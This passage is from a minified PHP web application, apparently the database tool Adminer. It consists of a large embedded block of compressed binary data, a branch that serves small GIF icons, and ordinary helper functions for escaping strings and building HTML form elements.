2WS%rZ1[%I\rd'bBGIDQHɥ\$R\0l% .3eԜqIa%2tR] I'L+R{ɍ'dtI\$ 4XJ+KxD< &P,Rl\0Na`Ga<%Ӂ_Pč%\0005(BF\"'Ic9BDA<b\"\"\n)ݲQ B&;,D%C&\0kJ|*T-J1Ҫ8X\n2a\n ZB=+H6(P\0k`\$HJҴN; 8\0Z+Cx%tʳ*|s\\ KLiʡ*`Y#DTt:,KDUD\$㜦O,tJ\\|*\01,\n>xB1pRKF`!.,ì,\$K#ԫr˝(Ժ\"K圩˟* (\$!Y1Y1}%/.RK(R628+I3\$[.x!E%D\"_K[.ܳ!_ʸD,.tK.HI\n2\r\"(@6\".e\0#Ї %Z~\nnoLJ|c',1KyY1s(&yf#Ƴ-%i-ʣ--|L<0R8Y,LR0(0l@*d2(̥*g6Q2\0,/MqHA3\$7L`\"M\"6L3;|+\"4>7,\0\$K 4,γ/Q,kbn@J0OR:B\0L!))4aOH#E.\\ղM`lH5I\0:Mq4sGLsaX\"UR&Wq.\$g@6@#eKiMDd#K@5sO+7PS͒\0Ƽ=87TM-5TP2a6MD+Bt\\M\r2DHdԂ|#Ԍ͚27I>CL@SF3\0#P:4IKI#J7C/M-4e?Na3 J?]JjsDr-\"LLΟ9CΦ#Э, )/Ӟ:(\n!퓱N\0'YMʷ;2N;rK.N3s8Y;s¹g<<2,\0#<2gO\$ҧ3-N<f,K<\\߳Ƃ 㘭 ,Jk\nΓ+RNL=DS7)Oy=KOG>Sw=dK#?O>\$<0O\$ӤO>pN#StJSO5?+bSO,sLJ\rOjSI#; O+|γb1!;ɡ@4O@4O=\$O%0L-ُNI89\nL쌭NM:\\2@N9llϿ( =Ɠ!;ĊO<3PRMBcdV2L4pknP++>\n@Lq\0\0,Q\\\n`[\"*Dж>zBT0:\0\ne \$rM4=l\nN)Cp480\0#J=@&3\0*C6 \"`#> (Q\n81Ct3EC\n`(z?b7\0[QN>'\0x c鎨\n2Cp@&\08\0\n䴏O\0/A\0#@cPD TR\n>dBDTLDt5PjpGAoQoG8,-rK#)9E5TQG4Ao\0>tMD8yRG@'PC <PC\"K\0`~\0e)8PvI(QGb6)\0H\r48@M)9\0FtQ!H{R URpO\0It8G]D4FD#Q+D'M>RgIQJU)EmTZE'#cEqFza>)TQ3H#TLqIjM&CRh@\nTK\00006\0IπFE@'љFphS5F\"nѮM%aoS E) B\"eћD3hAF4tlJ\$CwHI<x\$J5`*\$`1ᅼ\rtۃ\n?848I%'瀪jCAS<#QD'6\0DȔ-S \0%=\0E\"RӽO]:ԑoGe!iӂ\ntxSN\"yNx4QP *E;ӱL}75#P,wt߅?A4N@\$*\rsBB?0\05Q3ao#z:`>TKPt5QCRQJ{\04poSR]\$ǑD[J' 'V u\$\rRA@)ӷR3c-?܁#?0SF4QG59Q`G3QS\$xRSaoTEB͏?+hSHUQ]M K\n4CmS\0N;PO!\"RT9SFU5-UTH(ԇTV\0J5UNT8ZR@,R&T@Ǒ uK6>&tQsPe\$UO;%\0V` `\$Ԣ@1о?\$\nJ.9WmWpu'W?NR^PUsCSTR6TNGOS'5%V?%PnJuPcR`\\V<CtP dxT?X<URu e..w*Rv)Q7NUM&ՄOX[ٹT\n_Q2L9Gh@%Q\$ZujTXeMuLT[Xk=V+RmV=jTOTm56Q}lSKk鏻ZnXէ[d+֨\nW\n\n6U\\ETqչ\\xtF\n3tOW)KUEUUPqVdՊP\rs\0C]t?Iv5fKMW>N@'#b=oPF(8Y-uV-UԹ]CI8\\\nrW(TR?-P\$ Z3u些B`>\0E]T#L L)מ:@#G)4R;VmD%8)Ǖ^Q#h H@ Ny4#c XR'7`\\\nEQ`m]WNdV'Z\r5GXEjuTE9\0T-UBOPQ65_xz#?-6TE-4\08\n X #D oRALm\r5eGN V64p\$a9NSaU?AU\n\"<9cufQ__0щ\0;CTIN2 ,SV=ػd=A+رJeӽQ5V\0E펖>Y1H@DYRYH~OcGTK>\"Ѿ\r/U܍&x?\n/>twѠ\0eq\$E\$?%-ىPegY}_-gE1Ye@0 {F\r!PMKv7Q-Q?(g\r\$Y=Q<h\0\0=#f-Z֣a^>Aֳ_-;THWZ@(X'hDf*JUH!IL'ǃfh 4[R<? /KEv>)iTX6iB!әg\0 G Q64>x\0!ڡBC>ݪQڙj8ՑTv(~>HCe֜7j3`PH23x Uk\n:OiUUA-xn=?CRMSQbx\0@R\0=`)ZzKP]lͳvmMׇD\r4QsS41QsQĂnYhd A` gE\nX'ku-SOw」 S6ۙDNNlWݙ%lA\0+*KMClx &\0Q4֡Uml!o`\$\"3v|3;iՕџm+hL%6%Mu3QF4I&THժ\\FCTQWLJCQezB[`#ime!hӕ^sC%!Y+ӋJNtMkXJ>a e e|2/qSWr%\$X(-Wp'uE7rEV%v[?CVVe5IMDOQq2LvR23`,RptT>-\0^Դ\\8Zs`\0<tK\\jh4W\04\\JZ3MUv^VeeYp>rRRxu[UXDKTRA^}uSuX^xVTAVu>U\0h<yT\\]|5v5vG#_53>Yb#[5bDhQ>Fۯ:NK<4%\0R?I! :K <].]P.ʃ\r8!oFjwPc}.T;`n{Pi^\$>+\0O%'\\õ36WyLH7#`@bK7y\r=0wyhB\0VoTgsW\0ڬH*R:z.^E7:Uz+0Yuf=UbX*\r\"\04D劷\n]_E\$?ELһkôy&( Z{{m@&sJ֓Kpw!|eN})|/Z9Ӻ-V|u4E1NAo_REwӝ}=4=\$I>XGT97I4=.@\r˱_ߒ%a\n\r#<MwJ0%(;7Z+FH٬Lc;#j%\0MTI,cõFoDoz;=hEYO (1MWwR8~VIo(rd \0\r\"?#bᮃ\",AE]qw!wRE\r]Nl 1pe08;z)H:APf5%SLہPàmj[@gA:h\$Ӣwu:-wҌFlq2gMSWhPwa\r.˾a'F9kӥ:AGpF3^2@]]P`N\r T%ՀO 5E b\"V<Q:DjN1&x(kۆk192Aυǡa&25a\rx J.ZX{+dX7^\$a~UxDʸr U&nN^X\0XgWU-م+C.Ta]1߯4LENج!﮼@0ۘ+7ˮhY6(w\0&n7ا)Ze \08b%ؗ7.\0 /\0`4N>74b/π\n\\5AZ*&0,-a 7O*xE\rJ̷;\"J߅\06c,@J`/LLq|Sg~\nPCwãG>>\0L;8݈RnpP^7x߸ob3R0aBǁr٩Ft#`πc`v =9'߯y#3[qy>5{[ja)V@&@ܳm\n59 'Ѩ8\0EaAAɐ5Y_~^A& !`JOX)h\rBIyY(,ad<ۄ!BX\0ٴk=Myc\09\n?B.^Ct `D:d c8:rwdLu+<QxO73dܥYёr}d@0l`V:xP\rJz\$ܷaqyl9GI^b\n(6K]ݓ>SNoSN&ynS<:%;6TyIQ.SdV>#?J],Le+SґaqX9Pe%ybeaUUeNW9WWW9C^cz#m@zMn^鮅^.\\FFE2rQ\\фl,\0\n9AVrNa``t@{?=8I50ypToXb*mы6dB\rb=\0:.e9Xbw_w@\0kqwј|ByvpCsS%9Ml2w~!s&kY0\$/fkEtgC١M ?4O^!&刎g/f1=V aE:#yN`)`Np\\.\"BAqxV:a8yfsy7gygS&gY5;@c3tn]to/7og8`3\08m\0\"\0氉[X?qFSvB\nZ!AoC-y:NO^xz~.19kD8!CNnfhg\r\r(ipe߅<+#-ZdJjh6gAXFh4dLhNZ9nxCPYhE~s`>Fk\n^}D)Zk,`ާz1Kcdluf> -ώq#a囘hP`PhaP`8]\nւ`3a`8'|0c1\08\0\"ZXdhV/hYUhMg9NaYs`7g?!6snޓ.?VҢNdJfspԤ\"K.D{^1JB#ciVx`<Sd÷f949/hyn?\\<Fc:Fpo4ތ^+Ƽ T&:jhfdi+2nޮvh(]j\0&ZmN JE\0ZS@%Ã>ސӿ]z9zz::)0Pօc|hV`h?dr2},O= yλ0I` =X7:_ɪzG8 dNjѠ\$Bo)2mnyK[Z{Y0Ãu\r/n\0NOiFRN:\rq>ɫ0@N*tKB[nTNphz JtdNDY>ȔF8η8vָxk9담]z>֩0ѓd#W,3:/7FRf{Z=O|hc֜3xF^r]tHi.u@A\0h@عߧsmNyVF25?~ԆѰfs`[Ric+1f@\n L^36Xt9=:( ;蟨SF@`;x,>y4_&ןeу,CFL0\rKQ3l9Ϛ@~2ԥ+gVN^\"+ b_FdHw~\rb\"0@s18pH#:KX~Πy^\$d!5wt!':xmT +O5~>P@õVPAӲ&\";Xh~t!)5aD38'I^خⷶ>ؚl;A~;j[>mӶPuf.A)=#m߶fzISmɶcA+D`/dd<Tn>/ٛm9Wi,I\0-F`i6;`{[S6RjەC#m=9gW:gh&ȆVIx[hIIZNmtW[+@k*/AEwL_8m{).-v\r:L`-@Ym{hjLh|:Y#@^˺<Ks8F@XD j7x:LN9OOlZNsDFd;ZP@^g47Ɠ`8 6#.EߠiS.7ȸe[zL4s0`~wf>[;㝆[{Y#w[Io fYo4;Ǜoˍ6T@B~;U .hr3N6PɞDŽV0ok1ESOȕ`7l҅IO٫7tQc9f-\0-\0/.^Rf<-n,95JcMv</h\rZK\0p\"FЈRF;|nv<\rp@Ed bhcX+вj7Gy/ۇhX.nXt.s^D]r~1LC@+@d\"i!OjtH\"/Y_欸t\n~q>ݦ[!oNƦ\0qV5,O \\^b+b* {c7roN!qwɹǑO;,P:b#3+\rS\$poK ~Ҝњx!_q-W`mx9&[e>dI*8NHz3µ(Ш-\nS/Zk1(k5!*C!(HnTD z-dІ(ABk@5 \0.&!cYL\"\0g)r,\"5O*'|rO)*-)H.2\"rchtڸm:`#[M0@1H#dژAC<m\n̏2ss*h1\0Ƒ\n1T/6=K'6F~>x JGG7,}/|8ѲG9Ʉ?9p: -o:3L:ɉ;Sbjxa|Y+6|vlOx<\\w?=S]b/;M#\rώ3Kt<x@R\\M)=d7>3HkLt:\$} 08/4\rg+ 3gsT55^xi0b\r|ʟb|٣pP \0ꐓ9,#9hI fʣ6`.\$zKW%J?cRMK>8AELn:a:P^_ =*a2GB&Nr2_Lnu!TԏDViqd9V]`\rnPMotjx )`\rv P`#tN-ԕ5ְ Yc債XPDxTalxVtx\0X磵VH\0ؤ#kXQF5|U OW-STW4~ڵ^W6uX=94@ ͉(]o֝KiWW=PZo}qyITvxuU]]jXKT\rH\\QE^@,5XuGguՙhP }GZGhmgWhwnu`(Z[WU_GhbGدSR[wX5Z/aW_uU%PUcQT[w[6(\r؇[U[w\\]RGf/b\\[ptU[ueSsDc]TTg?J-um@ՉMb\$-p4Ej=RUb=^u}UV\rVSt]v<Vۋhe\ndWi֕V'iُ[}<XuU\n]]]h]=_UBw%]X^_jcQՕ7b>MekiPm[\0_Y=vsȕ'Gr]f=Ku#h_Q; ͣx>[Jq5QٱKJ#eDSvfVNdx4vU\\p}TMj4vtvC|VAaq~/?ſz{TucAo\0\"駌4X3یMDWYXM;cOׅ`MH%e7c:u ~B;O0UYE͕@6UWߏymς:=͘2:3ylG,0-]hn~*Ӣ<>r諢A<>_>i\n)킓.~;3S_DBf|W\n.`w\0##>u~C [3;o Ff!HxG!+@X AT;BBEi@ٚ ~\0JǁC# oI)yaJj2<:}FoqjxNL@Dxǡ59vTR C9ĩ7_AP_X|6#>^qOO\noT&dڤR.LUgwPV#9*T\$̺{f]ȋpgD.<kcazk316pYv_3ז|=8CFvS<3iy|^bzWLNc]u&8c|d9z9N~oı䮃:=N~6=d <>M-A~ 3]F.{QP-@Nl{?QQAA;_{R:]6<cǏo^-B9ϰ9FjcAaN0s5{w_@~䙈g︹{`{\0X:/伎!&lP/)P)23nr3mD1|\ron﹕{'>||H\r eSE==svscKKO¥|:8|7N:ga& F}5/e~CJ\"`/|Lb_ǟ!06 |{*B#f_\";12kINc\rG<77G̱344;{\\gǯA?vy.eYCCf|[?D_ѻ;I/ҹ7}2%8cbǿRr\0۽~KƳ?3[Iq;?\\qSoY} i7L5>Kz13:|{lz?nf/jHvomw\\\"|{|1ti^1e|]8*F݅=/Fk/GۮD~Ѱ%A⟎[ଅ\$Ǜm8%_-\0z`ߐS\$EIe~Qi ~{@[_~g%xO_rk<zE01g`1Ү+G7q8;ǟrzM=(O~{io95NGT@ρy?B\\ sa1\"G츙:hwgs/x5g\\nۅ8>ڟfۄ\r_t8|\"Mf߭8=\0p\\ oEgOǫߦ{f\"+n.u<Nl\$tvgs{zT'I\"Äd x^z\$mˤ킏A!LD<bg|y,ƺҟ%C\0@馑c)v/.7InD+;P 7crF\$.`63iF>D63SQ^&|'D6bZ72>% Ǹ 0&=qva08z\$x bCo&=jDM1=jb0d[Kj\0<b1tMQ\$OpBv0@0߸qHUG\0|pPUF+#>ppN+h[ko@n5!0\"&qeI+bt(c`AsSI8qlml\rv,AN!pw((AqBsd~ #VvsB`|?jΥ2?E@Tމh R>~ս8-[ʿg>e]Hď\rn>zd6ěc^9L\"uvف3\$wQ\r' ,Y=-*l?xl_HQjVe+QH rOǧm%Q/Є(! @d1T0X==oa-,[hz\$dy|xt;p_.?~5\0+>ݭpa6L8t;H0PeA;M56pL\nΐjY~^y\rP/hv3-i/@m[|M \n6K#1hFT)ߘ(Dm\n=%u#\$Nm:X\$>O\0M\"Cq4٧돇/O\\K\"d(Bx=[NpIdVlRy}W|~B31L ݮbO՛:]9Ńh#R?P69،\0g8B.\${`іh?hmG]nQ8 FiZ 7quyxFF+ 0qJv+J2pr\n%'?nhF0F=B'~\n52|e1<\rЛ5qn f@>e1h\$sX3\r@z+鶩9 '2GaFܐС(T)\rJ\$7GkD9)\0\0\\)f+(Y\0P-b`WMrPc7Ro(Irt(7\n`)\r#5I/70 OSX=:EV*(Ir0\\ƹt7hq5ۓIe#-pJtO {%&/h^\":w#&\"Hо\$Iuph*yX_C8Y.1TPġxj4)AӑsE\$q WSPbbVcd.rn۴.иdžA/3!V_ZHMg-+\\RS˅qZGrQNa*vYܒW[VNbuH)(y\\1@J̝Y~`z]v B%PVGvA`%') SZRi)5SD49Jb;)3,9M46EPߔÛ&t\na*\$unAբꎖT?%D2XttڅցTYheƝ&v\"pK1d,ZQUfnݰq\\\\6\"DJZUP\nTYh)UZ`qUԵ>5iͣTIlrܕ}ki}ȴU_*)\$@FmrJV+Vh-cJ鳪pͭ[0?ՉN\\x!9 \n:EYҋ\n.V`?3M>,[@ir>5|D؈MYBGx\n̰qhڵXsQ:h*5]@b=G\"sxZG@ſM<W#^D=ABxgG6'MCt[,<'@L\"n_%[8f:%K8=&03`~P\n.D^^OA\0{F\\d V\\=vc SF^(_?t,*۴\\gbJDDqיشPuxf,=לPdh i\$dz4}U~(1Abg1@j[dZ㆙0JJ3vL@Iq&%&3LJLnu%ՑF7h./Ln'{GpOL0|R/mn|k]\0%t텘DNN\"n*4T2b3t| eggJOȡ,A(NvF@\"g^ob;S*\0_nL߁95sTyP0fxG4)D|.]MBHt\098Fa`H\n X8+B|k<\0\n)8fbBH9 H?,| 4P1\nPs\0@%#E\r\0ů\00?\0ũ,\0hj\08\0l\0.[lbŴ\0p\0.f@qn0\0i>.\\u7uB-D[pnbE,\0] Er\0/l[p\r\0000k-P@\rE\0g.Z~\"\0q&/g\r\0k.D`Hx\"\0n\0`xm\0a K2E#-\\ZQl\"\0006\nP`q\"Ūc4 |'c1^Qlcό1D^xoY[\0s21\\^ @\rbF\02D[7z-\0E`/dXјbFM&._xqw5! q@Eb4\$]xqF%4\\ZɱxF.]ɠc'1`HqY.,g趀6F6/ƭz5b`\rGF(JMf.Le@1\0005I5e(Ƒb2|[ \r#51V0|kő49Ug(\"m5e`\r4EF.[10di1k\"Fo ~7g#oF/4[1I\0i7\0XΑn#LF\0i0tfױl#Ƴa4[HQFW'.\\mαύ30(QoF\r N1tp1PE.H1lc^F~4_Xqc*7/:/qx1rF\0en/HOF/.axqrV4_#F`K:]YZ-qcjFz;0(QƧ\$.fqXEڎg2lhcZn3l(ˢݍk&<kQo/ы^7j(G#y\":sa#2L_h1f-2zhQcFfKnZH\$n\0IcEƎ64}1cG\0s-v8ӑ#nƤoR:rb\00017|lHQF2rxQ@8||d#Lj1)fHGM7\$c챿3GՋz.l}E\"ǃPK1acoF b=TaqƄ,>?f92QFW>?4b1d'u 3|sc6Bm\0EƐj=fHr>5dlIQ|ƍ^9cqtH;5cQՍ!.?`hq HYn.|GacXG?td\rIz>Ld\$HW9Xqd0-J@,q(.:x8ı=J/gq1G\"^.dsxrHF?XGzW.0|v`]E^0\$ZQ#sGl3[r\$?G\"Z0\$dbHt~@eyђbȪ\"61xcH=,c)\\}\"G_c;V/<nrE\rFtp1w;CY\"3T8bF8ADkr&E>|ч#[GZNHk2%MF[8oѓc\0;m-њFyJAlRMdɍ\"8\$n81Y0|2\$G<,#aGP \nFtR^( 6Ja(bIaU#3hXq}\$ũ!N;\\?2%\$ǛUnG2&~ƶeLlh8\$SGjbB\$w⤮\\>Lm(@Ǜ8g1!cSF#\$Hgh\"cE:DsHѺLJ~Hԛqt~60(b7dIqvƜ~-kX)\"N4YIOEx xd 瓄ɂ\\x᱘G% z6rq~pIΐk&\n=I=%EK\"G܂ #]F'&.l_&nc\\鍗/[@'nM8FG\$qMȰ<[Qc2Ț%<\\Y1ƒ&:|qCc-%'2xH|#0)blHXJtrex%#3\$R5S!.(GӔE:lr \$q&B1a rIC˱NJaBD[踲XJCMCՑc[.>4 #ѯ5I(6zQ1x;s(3lI]*(*T<xX屌:aP,4H㨖PuİBQ.EIU\$e*FT@>%+f\nQn-U#UHj]Ҷ:x1+k'UKVmCС}s)pV,VºT7v.QZu{+\nDe\npx.|\0)}I<0\0IZ\$k !YhRdQS%.%9ĩbW\"\0)Yv*VWXZe/:,OաxÆQ!,`B _.%Ŗtm\nJKVy}M, 喦l+qap0Ԓ;]R #(*^~>-TѪ#8@Y \n!;GvPj%)9E-V:UJ jDKwF0R%ȭUF?[ADTwPQ¬<ɔa1>@Na(2ychݕ\0P:]yW3[<@%gBp;HKsWıYr`f']ؼ\nbU%ݩS2GdBpjebRYZk锵\0U\04JڬU dɕ'TH]֊GJU/v.ZB% /\n&RkW\\ Q r^W\$Yp~IfR;eK?%BQQ-+«,QfdꉥrL6ҩWIs&\\a)*/Cu1-՚E~Vs,D*26&Pu\\aC;d13F0w9D2g&l|^ H.c9p0;u\rQH00.\"dga]U\\Y{ȕ{kb\n_2FK&Na[őg&J!G-\\bb݉̋HTÅ2PÊvi ynjۃL!#9,a\$7b&*&[,:fSkҴV̻e3IZ<yq7݊weν<*\0P 0W̾UrgreVHfi4+ZЦ6_+RVS%,g۵Uĉ%0&hLn`¬QNYv!Tj32QRt9 3FĒouF-tD&q\ni\n*5H4\niU8+;S⾕}o3EM@XjBfUU~RA-6i *|ԬQMYxsTWȣTpXB9<f^\\#2h\nxT*gռ=%4>j#GU涫 =i`\n唻=\0[iݢK4jixWU.gp[~\r{u6eV-^Ԗe)sPfͧw֎?'}J&b64mrə]]:Q6ZI}rLZ7[2UZLQDstDyQ}-m\$ٹ<Mt칡an3<L5W#DKRۚor͢v4MQ׃\n&&V4rW݇}sI8M1S8 ^dIUE1JpsYSVKݚk8Ri̙h,SQf:nePAMVn_dԉ+UUכ5>n#wU& MWV]ݵcWpX8DyY!)Lvw7m䉮`UK?)5Q4ٻ>%w+~kxr\$M~2Fr|)a&\"[6\"Ytݵ4ݨKmv8~r+)y)6Yk¯űv<m XXk6 *1A΄k0sI*ϝTL0>ɺoTV\"&o-:g\$3:&uMևF%idD?f*9Vq, yUQ\0:IZB'K&o%\$JI&;jW8v,칣Su8)]\$3,N\$x0O|*M'o39[ÓOBM|ܾӸ8vŊCzN08cǫM[5tꐖj#(_;q3|B!I3f Mo\05xUOǦzζ6uSM{;v1覝הd͔C9W§uVS'>T]6}J@KZGkOV#\$H\$ZՀ(\0_V&?h 3'G6F2pj,K.S豑|iqgJѝIvC\0+\0GYnLjd\01\0M>dujCWSO\0amU7<XEQⰾ|JDgυ.r|(WrC-QW\\S0\0_#6<TռSoS>{dUYw\0)_YzJ'O\$H.lc%&X8SgϋY)?ZU 39\0/\0A%k2 T=%K5&^ʫu{ɖ\n씽-,[_} ֖Oşr~,ynGOMo|Di#P\ni@>O\nz/@sKg|mޒ7,Π=3g)v@,vYP&@Cdvs9BCJgTX@0>օ\"yQP c1eg^9AEg;\$x4%1YI}r%24i;SA\\;jd[qm\rVOAsJ͙T@Zڠ\n(?T2!E*._MѬ[;=@8KX2QM<anВ<ЊV\0BZ\"3hNU\r`LߩjבXzV,{t/UƢHBU_R`ruA3Mz 0ҡejt8(ltIyT9XC?ꉩ{jKВSCֵ5~rͱC:ȅxt<pϽ\0~I4?)ǗN_RIVĵKnBʴ:}z\n5@Q\"UBIn0\"Zf\0(B\ri5Ek\\eڔ*10=z@ˢey\r !Y||J)8gEHgUQS%D\r5\n`<:!u(lC0C˅ThU?w\"˔)\n2Nlr0*9Ⱦ,?L26d+X9Bx\0\n_FN5BAMB[OJ:2Y\rH߭P0Z&5+\ruĘ?bݪ\"t(ʽN{U(Kh@<?j(;NP\$\n&Q\\GmP5;An8YiNC,Ie>mUڛKCѣsc1 ltOef̭WUC}˒gOS%[WRG=Ɛ}5tte\\INYk1)\rQjB{)H-\"zDt9{yMf-]2>d(ts%]\$H?%\"n#T@wjt8RBIHrB\$w2!\n#4(2Y\nnEd&4/dG[XV%S*oQ?\0rk`sد0%+б4fyG\0\nXq3``fD9䂐iDŖPTddI#?x(đYTtǂ\0aPd\rP-,ȺԳl^-@=i\0006|z[\08K*W4hإaKu,b4){K6-_iB --`Է)cRަLDhZ^ K.bR7LR<btL\n2k4e3L2dJ~Le-fg6L=3p)wS7M3za)S7\0oM1}3zb)S75MR1k#liLmgiS?L64:g4lGKr64m#lO65:nt#lWM2h\nj\0\"N@u88)˧M1JqtѧM.qt۩ӒN*8zqtީӎN7s̆/E9JuTӨ9M7*tbӌgN -9\n`iSN;].S_\"-tiRёwO&ptˑwNꞭ<t4i%IO}:zpv٧O6E>ZvISOb>{S৻OZ2m7j|)k*pT\$T P:@j}1Su@*yUO \nTiHR#Px -?2T%?NBA{2ܐM8pe)TEN&?Z4j!-1PBILQ<Dʁ¾SQV%1 r%ODjcj\$]M}.]<[UbTkKPrha5R/OQjR2:%ħQޣ}>ڏUj֨OΤHz5j\"T Ore?ꑕ@ԌR2H:iiR:9\n\"7;RJZU)jJT/R0\r1~J=Rƥbѯj43RHuKq}QToS\r܈\0TˑS:-M\nzTΎSZFu5RTrSZMMu7VoSZIZgESv[:8jxSeʝ:j4LZQ*Sңb>*:ũS|Zڙ*zPj5B*`E'T2[uD*9E۩=QjnjKTr\\jH*`EOTfJчj*bR5L*dߪwTҦeuN|XES6ԧMTUU*{UZ %M4 I*%B?P.Vj&U>9f~Tڑ*GzMfUjeRrMW5UVʪ}Jj5X#-ՉU/XUSbUO}VlxZ[Tǫ1U>MYjmh՟fW5UUZضm*߫eFZ^Փz}Nʶ՜o\"j\rUњՏ,op0>\0IU^,M\03UՌ.;Auu#ESZ?\0WWѯ*ǫW:coȁTJQJ5|*VU35_^|l5|k#V橕[xSUyXzT\nՁF9X.1%`*eƬ[ʱ}a@7qV<`U^V*WNUVdUKWVl~5dUX]c U/edd{*EdrUezckE[VF-c겡4\nBFJ|ʃ{O<h\$!\0K<w5kNp)]z+zeS.iF:j<ĴЭV:ގ^\nO![`ny\n kzMKZv¾W:T;r\rkR䂕D8Q<ir+!'d!Z^l5s3TQo< 3\\>u<A*^\$9>|DW\rK@X[z۱`үLٚM3n1N@X\\i;5g#\\G\0Ljk?͚v4k*u>.\r5rB `eZ2)+IW!Z:izuVF*RM\\HLɧNi\\L֧bZk4Ik[PֹJk)(W, 9晱jnfxv]6yӵ*U'8,BU6Fۦ[Ku3duma-J769s<'\nVY/[ƻmo:uC9W:\nV\\piʭ+֊JfmwuVKWxU+\\znrzSU#W%ZwE?ѝL9~foI+VQa\\SJ(g\$MDܥl:Ӕjtj| v\n;dxzsYPW5<DYK_JcZrn _k^+m,3\\aBerĹJj+Fw;)\$9]N\$\0PٵYL_K1f%ɖ;amK\"\0% 6.?w\nχKlx)Yaؑ#_>M(3mP9h3ӻb0~[X4NܹHaɨYkAvt6^:Q_l\"9NR A\nQ¸kLl+@#t KvB;^ !gl9HD2.{^; `44z\rG\r\0[\0\$\\D\"Ğ q7{RN(uqQ%Hxmt0_&EahE7gn8Xv\r%Mf^Ӎh01ɱ=RI\ryq\r/&XԱLc\n\$@J0D})/d./6,t遖!@!\0V.gFW^e5i \"DR Z/\",6=!dD1}6/FTc;`x+#쓱70*J!lQ*hD PbBY0\0\nɝ!\rKVэ15GVP4=;w+%lYIFŔ T1e 9g1mi:\0S3N38vaN x]El><LT\rEbhH..+6aAဟ JY\"lŐ5̺b\0o\")XfSdR(fu>{\"Aq8A½{8p8k2LY˩ⵛ64VđTX\\śY1fǠq:u|\\},O0{dds͂C B5#H1zl\0%o,0Hide'?6xֱ5Qy|p\r+=pX\r`!q,>g\$@pٸ\\6\${^&ϛ{<yZ6jǾejo\$MX(vl@MhdEXDVy|jHu`TpZ/Fe-{EsNdp\$uPdd5o2Lؿ\nc8^fX\n:Z{o<t1i,:E6C*+=iݦ(ԬV_rE!lDvZōpʶN<=KΓr #@;\04v7YkA`(K֨#̃2\rQH!/v7l/cb!Xx(46@cLjJ!7fzX v6ȵ=pTqX-`5zj\0ck%iMx:tLc1,Ņv4)N/9B逊\r9N8IG@ {:/MxJ'E((#rHE'2`qS|a`R9@⼍^ڀsBFWkd&ݥMOn\0!0#6z/)Yæ]q^xOK/\n[G ab:9;3dMS?9R\r?\"s1g~xא");}else{header("Content-Type: image/gif");switch($_GET["file"]){case"plus.gif":echo"GIF89a\0\0\0001\0\0\0\0\0!\0\0\0,\0\0\0\0\0\0!M*)o) qe#L\0;";break;case"cross.gif":echo"GIF89a\0\0\0001\0\0\0\0\0!\0\0\0,\0\0\0\0\0\0##\naFo~y._wa1JGL6]\0\0;";break;case"up.gif":echo"GIF89a\0\0\0001\0\0\0\0\0!\0\0\0,\0\0\0\0\0\0 MQN\n}a8yaŶ\0\0;";break;case"down.gif":echo"GIF89a\0\0\0001\0\0\0\0\0!\0\0\0,\0\0\0\0\0\0 M*)[W\\L&ٜƶ\0\0;";break;case"arrow.gif":echo"GIF89a\0\n\0\0\0!\0\0\0,\0\0\0\0\0\n\0\0iӲ\0\0;";break;}}exit;}function
connection(){global$g;return$g;}function
adminer(){global$b;return$b;}function
idf_unescape($u){$Vd=substr($u,-1);return
str_replace($Vd.$Vd,$Vd,substr($u,1,-1));}function
escape_string($X){return
substr(q($X),1,-1);}function
number($X){return
preg_replace('~[^0-9]+~','',$X);}function
remove_slashes($Qf,$Lc=false){if(get_magic_quotes_gpc()){while(list($y,$X)=each($Qf)){foreach($X
as$Kd=>$W){unset($Qf[$y][$Kd]);if(is_array($W)){$Qf[$y][stripslashes($Kd)]=$W;$Qf[]=&$Qf[$y][stripslashes($Kd)];}else$Qf[$y][stripslashes($Kd)]=($Lc?$W:stripslashes($W));}}}}function
bracket_escape($u,$Na=false){static$Gh=array(':'=>':1',']'=>':2','['=>':3','"'=>':4');return
strtr($u,($Na?array_flip($Gh):$Gh));}function
charset($g){return(version_compare($g->server_info,"5.5.3")>=0?"utf8mb4":"utf8");}function
h($Q){return
str_replace("\0","�",htmlspecialchars($Q,ENT_QUOTES,'utf-8'));}function
nbsp($Q){return(trim($Q)!=""?h($Q):" ");}function
nl_br($Q){return
str_replace("\n","<br>",$Q);}function
checkbox($C,$Y,$db,$Rd="",$Ve="",$ib="",$Sd=""){$J="<input type='checkbox' name='$C' value='".h($Y)."'".($db?" checked":"").($Sd?" aria-labelledby='$Sd'":"").($Ve?' onclick="'.h($Ve).'"':'').">";return($Rd!=""||$ib?"<label".($ib?" class='$ib'":"").">$J".h($Rd)."</label>":$J);}function
optionlist($bf,$Bg=null,$ei=false){$J="";foreach($bf
as$Kd=>$W){$cf=array($Kd=>$W);if(is_array($W)){$J.='<optgroup label="'.h($Kd).'">';$cf=$W;}foreach($cf
as$y=>$X)$J.='<option'.($ei||is_string($y)?' value="'.h($y).'"':'').(($ei||is_string($y)?(string)$y:$X)===$Bg?' selected':'').'>'.h($X);if(is_array($W))$J.='</optgroup>';}return$J;}function
html_select($C,$bf,$Y="",$Ue=true,$Sd=""){if($Ue)return"<select name='".h($C)."'".(is_string($Ue)?' onchange="'.h($Ue).'"':"").($Sd?" aria-labelledby='$Sd'":"").">".optionlist($bf,$Y)."</select>";$J="";foreach($bf
as$y=>$X)$J.="<label><input type='radio' name='".h($C)."' value='".h($y)."'".($y==$Y?" checked":"").">".h($X)."</label>";return$J;}function
select_input($Ja,$bf,$Y="",$Cf=""){return($bf?"<select$Ja><option value=''>$Cf".optionlist($bf,$Y,true)."</select>":"<input$Ja size='10' value='".h($Y)."' placeholder='$Cf'>");}function
confirm(){return" onclick=\"return confirm('".lang(0)."');\"";}function
print_fieldset($t,$ae,$pi=false,$Ve=""){echo"<fieldset><legend><a href='#fieldset-$t' onclick=\"".h($Ve)."return !toggle('fieldset-$t');\">$ae</a></legend><div id='fieldset-$t'".($pi?"":" class='hidden'").">\n";}function
bold($Va,$ib=""){return($Va?" class='active $ib'":($ib?" class='$ib'":""));}function
odd($J=' class="odd"'){static$s=0;if(!$J)$s=-1;return($s++%2?$J:'');}function
js_escape($Q){return
addcslashes($Q,"\r\n'\\/");}function
json_row($y,$X=null){static$Mc=true;if($Mc)echo"{";if($y!=""){echo($Mc?"":",")."\n\t\"".addcslashes($y,"\r\n\t\"\\/").'": '.($X!==null?'"'.addcslashes($X,"\r\n\"\\/").'"':'null');$Mc=false;}else{echo"\n}\n";$Mc=true;}}function
ini_bool($xd){$X=ini_get($xd);return(preg_match('~^(on|true|yes)$~i',$X)||(int)$X);}function
sid(){static$J;if($J===null)$J=(SID&&!($_COOKIE&&ini_bool("session.use_cookies")));return$J;}function
